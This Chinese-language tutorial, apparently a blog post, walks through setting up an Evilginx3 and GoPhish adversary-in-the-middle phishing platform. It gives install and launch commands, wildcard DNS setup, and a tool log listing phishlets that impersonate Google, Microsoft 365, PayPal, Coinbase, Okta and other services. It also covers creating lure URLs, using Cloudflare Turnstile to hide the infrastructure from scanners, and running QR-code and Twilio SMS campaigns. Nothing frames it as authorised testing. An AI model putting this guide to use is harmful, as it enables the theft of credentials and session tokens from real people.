参考:使用Evilginx3和Gophish的AiTM网络钓鱼攻击
基础架构
编译启动环境
克隆代码:从Github库中克隆代码或这下载压缩包上传服务器
git clone https://github.com/fin3ss3g0d/evilgophish.git运行安装脚本:在终端中导航到evilgophish存储库的目录,并运行以下命令以安装依赖项并配置evilgophish:
./setup.sh [example.com] "[accounts myaccount]" false true [user_id]请根据你的实际情况替换示例中的参数(执行过程会从Github中拉取文件,请自行解决网络问题)。
./setup.sh yangzihome.space "pish" false true 22db54d1-8c32-4131-8005-080173971679启动GoPhish
启动GoPhish:导航到GoPhish目录,并运行以下命令:
cd gophish
./gophish配置Phishlets页面
目录/evilgophish/evilginx3/legacy_phishlets 中已存在部分Phishlets
自建参考:https://bbs.yangzihome.space/archives/Evilginx3-Phishlets
下载最新:https://github.com/simplerhacking/Evilginx3-Phishlets
域名解析
注意:启动前请将需要伪造的域名进行泛域名解析,如果未解析,将无法获取TLS证书。
配置DNS泛解析的步骤:
登录到你的DNS服务提供商的控制台。
找到你的域名管理页面,并进入DNS设置。
为指定的(子)域名添加一条新的A或NS记录:
例如,在Cloudflare的DNS设置中,这可能看起来像这样:
类型:A
名称:*
IPv4地址:123.123.123.123
类型:NS
名称:*
名称服务器:ns1.example.com
启动evilginx 创建伪造页面
确保将/home/evilgophish/gophish/gophish.db替换为GoPhish的数据库的完整路径;将/home/evilgophish/evilginx3/legacy_phishlets 替换为evilginx的Phishlets配置文件路径(文件请自行创建)。
注意:为确保数据库读取正常,请确保gophish.db文件的读写权限。
启动evilginx3 v3.2版本
./evilginx3 -g /home/evilgophish/gophish/gophish.db -p /home/evilgophish/evilginx3/legacy_phishlets/
___________ __ __ __
\_ _____/__ _|__| | ____ |__| ____ ___ ___
| __)_\ \/ / | | / __ \| |/ \\ \/ /
| \\ /| | |__/ /_/ > | | \> <
/_______ / \_/ |__|____/\___ /|__|___| /__/\_ \
\/ /_____/ \/ \/
- -- Community Edition -- -
by Kuba Gretzky (@mrgretzky) version 3.2.0
[13:25:11] [inf] Evilginx Mastery Course: https://academy.breakdev.org/evilginx-mastery (learn how to create phishlets)
[13:25:11] [inf] loading phishlets from: /home/evilgophish/evilginx3/legacy_phishlets/
[13:25:11] [inf] loading configuration from: /root/.evilginx
[13:25:11] [inf] blacklist mode set to: unauth
[13:25:11] [inf] unauthorized request redirection URL set to: https://www.youtube.com/watch?v=dQw4w9WgXcQ
[13:25:11] [inf] https port set to: 443
[13:25:11] [inf] dns port set to: 53
[13:25:11] [inf] autocert is now enabled
[13:25:12] [inf] blacklist: loaded 0 ip addresses and 0 ip masks
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'airbnb' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'citrix' and 'cisco-vpn' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'citrix' and 'cisco-vpn' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'airbnb' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'airbnb' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'airbnb' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o365' and 'o3652' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o365' and 'o3652' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o3652' and 'o365' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'citrix' and 'cisco-vpn' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o3652' and 'o365' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'citrix' and 'cisco-vpn' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o3652' and 'o365' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'citrix' and 'cisco-vpn' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o3652' and 'o365' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'citrix' and 'cisco-vpn' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o3652' and 'o365' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'citrix' and 'cisco-vpn' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'citrix' and 'cisco-vpn' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o365' and 'o3652' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o3652' and 'o365' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'abs.twimg.com' collision between 'twitter' and 'twitter-mobile' phishlets
[13:25:12] [war] phishlets: hostname 'api.twitter.com' collision between 'twitter' and 'twitter-mobile' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o3652' and 'o365' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'citrix' and 'cisco-vpn' phishlets
[13:25:12] [war] phishlets: hostname 'abs.twimg.com' collision between 'twitter' and 'twitter-mobile' phishlets
[13:25:12] [war] phishlets: hostname 'api.twitter.com' collision between 'twitter' and 'twitter-mobile' phishlets
[13:25:12] [war] phishlets: hostname 'google.google.com' collision between 'coinbase' and 'airbnb' phishlets
[13:25:12] [war] phishlets: hostname 'www.google.com' collision between 'google' and 'coinbase' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'clients4.google.com' collision between 'google' and 'google' phishlets
[13:25:12] [war] phishlets: hostname 'subdomainhere.domainhere' collision between 'cisco-vpn' and 'citrix' phishlets
[13:25:12] [war] phishlets: hostname 'login.microsoftonline.com' collision between 'o3652' and 'o365' phishlets
[13:25:12] [war] phishlets: hostname 'booking.com' collision between 'booking' and 'booking' phishlets
[13:25:12] [war] server domain not set! type: config domain <domain>
[13:25:12] [war] server external ip not set! type: config ipv4 external <external_ipv4_address>
[13:25:12] [inf] obtaining and setting up 0 TLS certificates - please wait up to 60 seconds...
[13:25:12] [inf] successfully set up all TLS certificates
+-----------------+-----------+-------------+-----------+-------------+
| phishlet | status | visibility | hostname | unauth_url |
+-----------------+-----------+-------------+-----------+-------------+
| airbnb | disabled | visible | | |
| amazon | disabled | visible | | |
| booking | disabled | visible | | |
| cisco-vpn | disabled | visible | | |
| citrix | disabled | visible | | |
| coinbase | disabled | visible | | |
| facebook | disabled | visible | | |
| github | disabled | visible | | |
| google | disabled | visible | | |
| instagram | disabled | visible | | |
| knowbe4 | disabled | visible | | |
| linkedin | disabled | visible | | |
| o365 | disabled | visible | | |
| o3652 | disabled | visible | | |
| okta | disabled | visible | | |
| onelogin | disabled | visible | | |
| outlook | disabled | visible | | |
| paypal | disabled | visible | | |
| protonmail | disabled | visible | | |
| reddit | disabled | visible | | |
| tiktok | disabled | visible | | |
| twitter | disabled | visible | | |
| twitter-mobile | disabled | visible | | |
| wordpress.org | disabled | visible | | |
+-----------------+-----------+-------------+-----------+-------------+
: 创建钓鱼Phishlet模板
输入命令检查已配置好的Phishlet模板
创建一个模板的子Phishlet,输入命令 phishlets 查看子Phishlet,如:amazon:aws ;可使用Tab键补全
phishlets create <模板名称> <子名称>启动Phishlet
phishlets enable 模板名称:子名称phishlets enable 模板名称:子名称删除Phishlet
phishlets delete 模板名称:子名称
创建钓鱼 Lure
查看已创建的Lure
创建Lure
执行命令创建lure,创建的lure会分配一个ID
lures create <Phishlet> 
删除Lure
执行命令删除lure,删除指定ID
lures delete <ID> 创建URL
lures get-url <ID>启动evilfeed(如果需要)
如果你选择了启用live feed,则需要启动evilfeed。导航到evilfeed目录,并运行以下命令:
cd evilfeed
./evilfeed4、启动Cloudflare Turnstile(如果需要):如果你选择了使用Cloudflare Turnstile,则需要启动它。按照Cloudflare Turnstile设置部分的说明操作。
5、开始活动:一切准备就绪后,你可以从GoPhish启动你的社会工程活动,并监视活动进展。
使用 Evilginx3 创建伪造页面
运行 Evilginx3:
使用以下命令启动 Evilginx3,并指定 Gophish 的数据库路径和 Cloudflare Turnstile 的公钥和私钥:
./evilginx3 -feed -g /path/to/gophish.db -turnstile <PUBLIC_KEY>:<PRIVATE_KEY> -p /path/to/phishlets其中
/path/to/gophish.db是你的 Gophish 数据库文件的路径,
<PUBLIC_KEY>和
<PRIVATE_KEY>是你的 Cloudflare Turnstile 的公钥和私钥,
/path/to/phishlets是你存储 Phishlet 的目录路径。
创建Cloudflare Turnstile
Cloudflare Turnstile的集成已经用“Apache2”取代了重定向规则和IP黑名单。“Apache2”方法依赖于预定义的重定向规则列表和IP黑名单。我们可能会错过某些最终检测到我们基础设施的用户代理、主机或IP地址。这通常是通过机器人和扫描网络钓鱼基础设施的自动化软件来完成的Cloudflare Turnstile的技术是在编写和验证实际用户访问您的网站时抵御机器人的最佳防御措施之一。
创建Cloudflare帐户
选择仪表板中的
Turnstile选项卡添加新网站并将域用于网络钓鱼网站/活动
用您自己的更改编辑
eviginx3/templates/bidden.html&eviginX3/templates/turnstyle.html文件当启动
evilginx3, 包括带有Turnstile标志的公钥/私钥:.。如:
./evilginx3 -feed -g ../gophish/gophish.db -turnstile <PUBLIC_KEY>:<PRIVATE_KEY>Cloudflare Turnstile HTML模板指南
如果我要为 Cloudflare Turnstile 功能包含一个静态HTML页面,那么每个人的钓鱼基础设施都将拥有相同的页面,并且会导致静态HTML代码检测。这就是Go HTML模板的用处。我在 evilginx3/templates/turnstile.html 中包含了一个起始模板作为指南 您需要更改此内容。以下是模板代码设置的规则,如果不遵循这些规则,可能会导致破坏 Cloudflare Turnstile 功能:
您必须包含
{{.FormActionURL}}、{{.ErrorMessage}}和{{.TurnstilePublicKey}}模板变量用于提交
Turnstile挑战的表单操作URL必须是{{.FormActionURL}}模板变量用于
cf-turnstilediv类的data-sitekey值必须是{{.TurnstilePublicKey}}模板变量您必须将模板保存在
evilginx3/templates/turnstile.html用于提交挑战表单的按钮必须将其名称属性设置为
button
replace_rid.sh
如果您曾经运行过 setup.sh 并且已经替换了整个项目中的默认 RId 值,那么 replace_rid.sh 就是为了再次替换 RId 值而创建的。
arduino复制代码用法:
./replace_rid <previous rid> <new rid>
- previous rid - 要替换的先前 rid 值
- new rid - 要用来替换先前值的新 rid 值
示例:
./replace_rid.sh user_id 22db54d1-8c32-4131-8005-080173971679二维码生成器
QR码生成器 功能允许您生成QR码,以部署QR码社会工程活动。以下是使用它的步骤:
在编辑电子邮件HTML模板时,现在可以包含
{{.QR}}模板变量:
在启动新的活动时,请输入QR码图片的大小:
结果将类似于以下内容,但您可以根据需要调整尺寸:
请注意,此功能目前仅支持电子邮件活动和HTML电子邮件模板
短信钓鱼活动
为了通过Twilio提供短信活动支持,对GoPhish进行了全面的改造。您的新evilgophish仪表板将如下所示:
运行setup.sh后,接下来的步骤是:
配置短信模板。您将仅在创建短信模板时使用文本,并且不应包含跟踪链接,因为它将出现在短信中。将信封发件人和主题留空,如下所示:
配置短信发送配置文件,从Twilio、帐户SID和身份验证令牌中输入您的电话号码:
导入组;为了兼容,CSV模板值保持不变,因此CSV列名保持不变,并将目标电话号码放入电子邮件列中;请注意,Twilio接受以下电话号码格式,因此它们必须是以下三种格式之一:
启动evilginx3并配置phishlet和lure (必须使用-g标志指定GoPhish sqlite3数据库的完整路径)
从GoPhish发起活动,并将登陆URL作为evilginx3 phishlet的诱饵路径
实时馈送设置
实时活动事件通知由本地websocket/http服务器和实时提要应用程序处理。要获取设置:
Select
trueforfeed boolwhen runningsetup.shcdinto theevilfeeddirectory and start the app with./evilfeedWhen starting
evilginx3, supply the-feedflag to enable the feed. For example:
./evilginx3 -feed -g /opt/evilgophish/gophish/gophish.db
You can begin viewing the live feed at:
http://localhost:1337/. The feed dashboard will look like below:
IMPORTANT NOTES
The live feed page hooks a websocket for events with
JavaScriptand you DO NOT need to refresh the page. If you refresh the page, you will LOSE all events up to that point.
参考
https://github.com/fin3ss3g0d/evilgophish